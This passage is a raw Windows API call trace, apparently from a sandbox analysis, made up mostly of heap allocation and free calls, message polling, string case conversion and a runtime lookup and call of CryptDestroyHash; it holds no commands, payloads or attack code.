hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.752] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.753] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0196.754] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.754] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.755] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.756] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.756] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.756] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.757] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0196.757] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.758] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0196.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466d90, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0196.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0196.759] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.759] CryptDestroyHash (hHash=0xaa57a0) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0196.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0196.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0196.760] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0196.760] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.761] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0196.762] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0196.762] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0196.762] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0196.763] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0196.763] HeapFree (in: 